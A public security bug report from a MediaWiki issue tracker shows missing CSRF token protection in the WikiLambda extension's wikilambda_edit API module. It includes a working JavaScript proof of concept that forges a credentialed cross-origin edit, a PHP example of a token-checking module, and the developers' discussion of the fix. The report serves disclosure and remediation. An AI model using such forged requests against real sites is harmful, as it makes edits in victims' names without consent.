
WikiLambda extension (wikilambda_edit action) is missing CSRF protection
Closed, Resolved | Public | Security

Description

The WikiLambda extension introduces a ZObject namespace and corresponding content model. For reasons unknown to me, editing this content model directly via action=edit has been disabled. Instead, there is a wikilambda_edit module – but this module has no token parameter, making it vulnerable to cross-site request forgery:

// Proof of concept: a page on an unrelated origin builds a wikilambda_edit
// request. Nothing in it is a CSRF token, and the module does not ask for one.
let formData = new FormData();
formData.append('action', 'wikilambda_edit');
formData.append('zid', 'Z10006');
formData.append('zobject', `
{
    "Z1K1": "Z2",
    "Z2K1": "Z10006",
    "Z2K2": {
        "Z1K1": "Z7",
        "Z7K1": "Z802",
        "Z802K1": {
            "Z1K1": "Z40",
            "Z40K1": "Z41"
        },
        "Z802K2": {
            "Z1K1": "This result"
        },
        "Z802K3": {
            "Z1K1": "Not this one"
        }
    },
    "Z2K3": {
        "Z1K1": "Z12",
        "Z12K1": [
            {
                "Z1K1": "Z11",
                "Z11K1": "Z1002",
                "Z11K2": "Example function call"
            },
            {
                "Z1K1": "Z11",
                "Z11K1": "Z1004",
                "Z11K2": "Exemple d’appel de fonction"
            },
            {
                "Z1K1": "Z11",
                "Z11K1": "Z1728",
                "Z11K2": "فراخوانی تابع نمونه"
            }
        ]
    }
}
`);
formData.append('summary', 'change label language codes to ZIDs');

// A multipart/form-data POST is a CORS "simple request", so the browser sends
// it without a preflight. credentials: 'include' attaches the victim's session
// cookies, so the wiki attributes the edit to the logged-in user. The attacking
// page cannot read the response, but the edit is saved regardless.
fetch('https://notwikilambda.toolforge.org/w/api.php', {
  method: 'POST',
  mode: 'cors',
  credentials: 'include',
  body: formData,
});

After running this code on tmp.lucaswerkmeister.de, this edit was made. (The link goes to the permalink, rather than the diff, because the old revision can’t be loaded for unrelated reasons; see T284368.)

I urge the WikiLambda development team to drop this custom API module, and just use action=edit directly. Apart from not lacking basic security measures, action=edit also has many other features, such as adding change tags, marking edits as minor, or specifying a base revision ID to detect edit conflicts; I see little reason to reimplement all of these in a custom API module. (Wikibase has a comparable wbeditentity API module, which also lacks some action=edit features, but I assume that this is because Wikibase partially predates the MediaWiki ContentHandler system, and using action=edit would not have provided adequate control over the content at the time – I hope that this is no longer an issue.)
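For comparison, here is what a MediaWiki API write module looks like when it lets ApiMain enforce a CSRF token. This is an added example, not the WikiLambda extension's module or the patch that fixed this task; the class name, the NS_ZOBJECT constant, the 'zobject' content model id, the message key and the parameter set are assumptions for illustration only. It targets the MediaWiki 1.36-era API (WikiPageFactory and doUserEditContent).

```php
<?php
// Added example (not the WikiLambda extension's code or its fix): a MediaWiki
// API write module with the three overrides that make ApiMain require and
// validate a CSRF token. Names marked "assumed" are not from the original page.

use MediaWiki\MediaWikiServices;
use Wikimedia\ParamValidator\ParamValidator;

class ApiExampleZObjectEdit extends ApiBase { // assumed class name

	public function execute() {
		// extractRequestParams() only returns once ApiMain has already
		// checked the `token` parameter (see needsToken() below).
		$params = $this->extractRequestParams();

		// Reject anything that is not well-formed JSON before touching
		// the database. The message key is assumed (defined by this
		// hypothetical extension's i18n files).
		$decoded = json_decode( $params['zobject'], true );
		if ( !is_array( $decoded ) ) {
			$this->dieWithError( 'apierror-example-invalidzobject' );
		}

		// NS_ZOBJECT is assumed to be the namespace constant for ZObjects.
		$title = Title::makeTitleSafe( NS_ZOBJECT, $params['zid'] );
		if ( !$title ) {
			$this->dieWithError( [ 'apierror-invalidtitle', $params['zid'] ] );
		}

		// Throws (via dieStatus) if the user may not edit this page.
		$this->checkTitleUserPermissions( $title, 'edit' );

		// 'zobject' is an assumed content model id.
		$content = ContentHandler::makeContent( $params['zobject'], $title, 'zobject' );
		$page = MediaWikiServices::getInstance()->getWikiPageFactory()->newFromTitle( $title );
		$status = $page->doUserEditContent( $content, $this->getUser(), $params['summary'] );
		if ( !$status->isOK() ) {
			$this->dieStatus( $status );
		}

		$this->getResult()->addValue( null, $this->getModuleName(), [
			'success' => 1,
			'title' => $title->getPrefixedText(),
		] );
	}

	// These three overrides are what a write module needs. With needsToken()
	// returning 'csrf', ApiMain adds a required `token` parameter and fails
	// the request with code "badtoken" unless the value matches the session's
	// edit token. A cross-origin page can make the browser send the victim's
	// cookies, but it cannot read the token, which is only obtainable from
	// action=query&meta=tokens by same-origin script.
	public function needsToken() {
		return 'csrf';
	}

	public function isWriteMode() {
		return true;
	}

	public function mustBePosted() {
		return true;
	}

	public function getAllowedParams() {
		return [
			'zid' => [
				ParamValidator::PARAM_TYPE => 'string',
				ParamValidator::PARAM_REQUIRED => true,
			],
			'zobject' => [
				ParamValidator::PARAM_TYPE => 'text',
				ParamValidator::PARAM_REQUIRED => true,
			],
			'summary' => [
				ParamValidator::PARAM_TYPE => 'string',
				ParamValidator::PARAM_DEFAULT => '',
			],
		];
	}
}
```

The check to make against any custom write module is simply whether `needsToken()` returns something other than `false`; if it does not, ApiMain never looks for a token and the proof of concept above works unchanged. Registering the module (the `APIModules` key in extension.json) is unaffected by these overrides.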

Event Timeline

We had to do this IIRC because of our use of the JsonContent class (action=edit wouldn't let us refuse nonsense edits, because JsonContent extends TextContent), and more importantly because we needed to generate the title on create (exactly like Wikibase), which again action=edit won't let us do. Fun times.

We might be able to add this feature into action=edit so that Wikibase could similarly migrate to it too?

Hm, I didn’t consider new page creations, that’s a good point. I’ll check if there are any other reasons why Wikibase still has a separate API module.

Patch addressing this is merged; we can keep exploring nicer ways of doing things, but I'll close this for now.

> Patch addressing this is merged; we can keep exploring nicer ways of doing things, but I'll close this for now.

Can this be made public? Or do we need to wait to backport the fix to prior branches? (and if so, should this be tracked at T285414: Write and send supplementary release announcement for extensions and skins with security patches (1.31.16/1.35.4/1.36.2)?)

> Can this be made public?

Sure.

> Or do we need to wait to backport the fix to prior branches? (and if so, should this be tracked at T285414: Write and send supplementary release announcement for extensions and skins with security patches (1.31.16/1.35.4/1.36.2)?)

Anyone foolish enough to install this code in their server and not live-updating it deserves whatever they get. :-)

>> Can this be made public?

> Sure.

I lack the rights to change the visibility (at least it's not showing up as an option in the edit form); would someone please make this public?

Legoktm changed the visibility from "Custom Policy" to "Public (No Login Required)". Jul 14 2021, 1:54 AM
Legoktm changed the edit policy from "Custom Policy" to "All Users".